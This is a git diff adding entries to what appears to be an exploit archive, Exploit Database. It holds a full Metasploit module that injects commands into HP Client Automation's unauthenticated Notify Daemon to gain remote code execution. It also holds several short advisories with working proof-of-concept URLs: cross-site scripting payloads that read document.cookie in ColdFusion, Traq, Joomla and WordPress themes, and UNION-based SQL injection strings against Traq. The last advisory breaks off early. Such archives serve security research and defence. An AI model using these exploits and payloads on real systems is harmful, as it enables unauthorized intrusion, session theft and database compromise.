diff --git a/files.csv b/files.csv
index df47eec6b..f509f92be 100755
--- a/files.csv
+++ b/files.csv
@@ -32599,3 +32599,13 @@ id,file,description,date,author,platform,type,port
36166,platforms/php/webapps/36166.txt,"BuddyPress 1.2.10, WordPress 3.1.x, DEV Blogs Mu 1.2.6 Regular Subscriber HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-09-26,"Stefan Schurtz",php,webapps,0
36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin <= 3.23 'serendipity[tagview]' Cross Site Scripting Vulnerability",2011-09-26,"Stefan Schurtz",php,webapps,0
+36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
+36170,platforms/php/webapps/36170.txt,"PunBB <= 1.3.6 'browse.php' Cross-Site Scripting Vulnerability",2011-09-26,Amir,php,webapps,0
+36171,platforms/php/webapps/36171.txt,"Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection Vulnerability",2011-09-26,"BHG Security Group",php,webapps,0
+36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 Multiple Cross Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
+36173,platforms/php/webapps/36173.txt,"Vanira CMS 'vtpidshow' Parameter SQL Injection Vulnerability",2011-09-27,"kurdish hackers team",php,webapps,0
+36174,platforms/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x Multiple Remote Security Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote,0
+36175,platforms/php/webapps/36175.txt,"Traq 2.2 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2011-09-28,"High-Tech Bridge SA",php,webapps,0
+36176,platforms/php/webapps/36176.txt,"Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps,0
+36177,platforms/php/webapps/36177.txt,"Bitweaver 2.8.1 Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps,0
+36178,platforms/php/webapps/36178.txt,"WordPress Atahualpa Theme 3.6.7 's' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0
diff --git a/platforms/cfm/webapps/36172.txt b/platforms/cfm/webapps/36172.txt
new file mode 100755
index 000000000..cc96a262f
--- /dev/null
+++ b/platforms/cfm/webapps/36172.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/49787/info
+
+Adobe ColdFusion is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Adobe ColdFusion 7 is vulnerable; other versions may also be affected.
+
+http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
+
+http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
+
+http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E
\ No newline at end of file
diff --git a/platforms/multiple/remote/36169.rb b/platforms/multiple/remote/36169.rb
new file mode 100755
index 000000000..5ca62f281
--- /dev/null
+++ b/platforms/multiple/remote/36169.rb
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Client Automation Command Injection',
+ 'Description' => %q{
+ This module exploits a command injection vulnerability on HP Client Automation, distributed
+ actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
+ Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither.
+ This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2
+ and CentOS 5.
+ },
+ 'Author' =>
+ [
+ 'Ben Turner', # Vulnerability discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2015-1497'],
+ ['ZDI', '15-038'],
+ ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
+ ],
+ 'Privileged' => true,
+ 'Platform' => %w{ unix win },
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10
+ },
+ 'Payload' => {'DisableNops' => true},
+ 'Targets' =>
+ [
+ [ 'HP Client Automation 9.0.0 / Linux',
+ {
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Payload' =>
+ {
+ 'Space' => 466,
+ 'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'openssl telnet generic gawk'
+ },
+ 'BadChars' => "\x27"
+ }
+ }
+ ],
+ [ 'HP Client Automation 9.0.0 / Windows',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jan 02 2014'))
+
+ register_options(
+ [
+ Opt::RPORT(3465)
+ ], self.class)
+
+ deregister_options('CMDSTAGER::FLAVOR')
+ deregister_options('CMDSTAGER::DECODER')
+ end
+
+ def check
+ connect
+ sock.put("\x00") # port
+ sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
+ sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
+ sock.put("hide\x00") # command
+ res = sock.get_once
+ disconnect
+
+ if res && res.unpack('C')[0] == 0
+ return Exploit::CheckCode::Detected
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ case target['Platform']
+ when 'win'
+ print_status('Exploiting Windows target...')
+ execute_cmdstager({:flavor => :vbs, :linemax => 290})
+ when 'unix'
+ print_status('Exploiting Linux target...')
+ exploit_unix
+ else
+ fail_with(Failure::NoTarget, 'Invalid target')
+ end
+ end
+
+ def exploit_unix
+ connect
+ sock.put("\x00") # port
+ sock.put("0\x00") # user ID
+ sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
+ sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected
+ disconnect
+ end
+
+ def execute_command(cmd, opts = {})
+ connect
+ sock.put("\x00") # port
+ sock.put("S-1-5-18\x00") # user ID
+ sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
+ sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
+ res = sock.get_once
+ disconnect
+ unless res && res.unpack('C')[0] == 0
+ fail_with(Failure::Unknown, "Something failed executing the stager...")
+ end
+ end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/36170.txt b/platforms/php/webapps/36170.txt
new file mode 100755
index 000000000..69aa6aaf5
--- /dev/null
+++ b/platforms/php/webapps/36170.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49776/info
+
+PunBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/browse.php?keywords=[xss]&search=Search&projects=1&styles=1&forums=1
\ No newline at end of file
diff --git a/platforms/php/webapps/36171.txt b/platforms/php/webapps/36171.txt
new file mode 100755
index 000000000..c8d0c70de
--- /dev/null
+++ b/platforms/php/webapps/36171.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49786/info
+
+The 'com_biitatemplateshop' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_biitatemplateshop&groups=[SQLI]
\ No newline at end of file
diff --git a/platforms/php/webapps/36173.txt b/platforms/php/webapps/36173.txt
new file mode 100755
index 000000000..173a914fc
--- /dev/null
+++ b/platforms/php/webapps/36173.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49789/info
+
+Vanira CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/voteshow.php?vact=ok&vtpidshow=1 [SQL insertion attacks]
\ No newline at end of file
diff --git a/platforms/php/webapps/36175.txt b/platforms/php/webapps/36175.txt
new file mode 100755
index 000000000..f02da9c1f
--- /dev/null
+++ b/platforms/php/webapps/36175.txt
@@ -0,0 +1,42 @@
+source: http://www.securityfocus.com/bid/49835/info
+
+Traq is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Traq 2.2 is vulnerable; prior versions may also be affected.
+
+1) Multiple cross-site scripting vulnerabilities that affect the 'edit' parameter of the following scripts:
+
+http://www.example.com/admincp/components.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/admincp/ticket_templates.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/admincp/custom_fields.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/admincp/groups.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+2) Multiple cross-site scripting vulnerabilities that affect the 'errors' parameter of the following scripts:
+
+http://www.example.com/admincp/components.php?edit&error&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
+http://www.example.com/admincp/groups.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/admincp/milestones.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/admincp/plugins.php?create&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/admincp/projects.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/admincp/repositories.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/admincp/users.php?edit&errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+Successful exploitation of the vulnerabilities requires that "register_globals" is enabled.
+
+3) A cross-site scripting vulnerability affects the 'goto' parameter of the 'user/login' script:
+
+http://www.example.com/user/login?goto=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+
+4) Multiple SQL-injection vulnerability affects the 'sort', 'order', 'component', 'milestone', 'priority', 'severity', 'status', 'type', 'version' parameters of the 'tickets' scripts:
+
+http://www.example.com/[PROJECT_ID]/tickets?sort=SQL_CODE_HERE
+http://www.example.com/[PROJECT_ID]/tickets?order=SQL_CODE_HERE
+http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&component=1%29/**/union/**/select/**/1,version%28%29,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
+http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&milestone=1%29/**/union/**/select/**/1,version%28%29,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
+http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&priority=1%29/**/union/**/select/**/1,version%28%29,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
+http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&severity=1%29/**/union/**/select/**/1,version%28%29,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
+http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&status=1%29/**/union/**/select/**/1,version%28%29,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
+http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&type=1%29/**/union/**/select/**/1,version%28%29,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
+http://www.example.com/[PROJECT_ID]/tickets?columns=ticket&version=1%29/**/union/**/select/**/1,version%28%29,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,29,20/**/from/**/traq_tickets/**/where/**/1/**/in/**/%281
diff --git a/platforms/php/webapps/36176.txt b/platforms/php/webapps/36176.txt
new file mode 100755
index 000000000..50eb39386
--- /dev/null
+++ b/platforms/php/webapps/36176.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/49853/info
+
+Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Joomla! 1.7.0 and prior are vulnerable.
+
+http://example.com/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
+
+
+http://example.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=
+
+
+http://example.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22
+
diff --git a/platforms/php/webapps/36177.txt b/platforms/php/webapps/36177.txt
new file mode 100755
index 000000000..4d6a1383c
--- /dev/null
+++ b/platforms/php/webapps/36177.txt
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/49864/info
+
+Bitweaver is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Bitweaver 2.8.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/bitweaver/users/register.php/"
+http://www.example.com/bitweaver/blogs/rankings.php/"
+http://www.example.com/bitweaver/articles/edit.php/"
+http://www.example.com/bitweaver/articles/list.php/"
+http://www.example.com/bitweaver/calendar/index.php/"
+http://www.example.com/bitweaver/events/list_events.php/"
+http://www.example.com/bitweaver/events/index.php/"
+http://www.example.com/bitweaver/pigeonholes/list.php/"
+http://www.example.com/bitweaver/fisheye/index.php/"
+http://www.example.com/bitweaver/recommends/index.php/"
+http://www.example.com/bitweaver/rss/index.php/"
+http://www.example.com/bitweaver/fisheye/list_galleries.php/"
+http://www.example.com/bitweaver/tags/"
+http://www.example.com/bitweaver/stencils/index.php/"
+http://www.example.com/bitweaver/stencils/list_stencils.php/"
+http://www.example.com/bitweaver/wiki/orphan_pages.php/"
+http://www.example.com/bitweaver/users/remind_password.php/"
+http://www.example.com/bitweaver/blogs/list_blogs.php/"
+http://www.example.com/bitweaver/liberty/list_content.php/"
+http://www.example.com/bitweaver/quicktags/special_chars.php?textarea_id=');"/>
+http://www.example.com/bitweaver/users/register.php -> Email -> '" -> Register
+
diff --git a/platforms/php/webapps/36178.txt b/platforms/php/webapps/36178.txt
new file mode 100755
index 000000000..6d4da9b32
--- /dev/null
+++ b/platforms/php/webapps/36178.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49865/info
+
+The Atahualpa theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to Atahualpa 3.6.8 are vulnerable.
+
+http://www.example.com/?s=%26%23039;%2balert(123)%2b%26%23039;
\ No newline at end of file
diff --git a/platforms/windows/remote/36174.txt b/platforms/windows/remote/36174.txt
new file mode 100755
index 000000000..a82bb3f3e
--- /dev/null
+++ b/platforms/windows/remote/36174.txt
@@ -0,0 +1,373 @@
+source: http://www.securityfocus.com/bid/49793/info
+
+ServersCheck Monitoring Software is prone to multiple remote input-validation vulnerabilities, including:
+
+1. Multiple HTML-injection vulnerabilities
+2. Multiple cross-site scripting vulnerabilities
+3. A cross-site request forgery vulnerability
+4. Multiple local file-include vulnerabilities
+5. A security vulnerability that may allow attackers to send arbitrary SMS messages from the vendor's phone number.
+
+An attacker can exploit these issues to execute arbitrary HTML and script code in the context of the browser or the Web server, gain access to sensitive information, send multiple SMS messages, and perform certain administrative tasks. Other attacks are also possible.
+
+Code Review: Input Validation Vulnerabilities (Persistent)
+
+http://www.example.com/userslist.html?
+
+
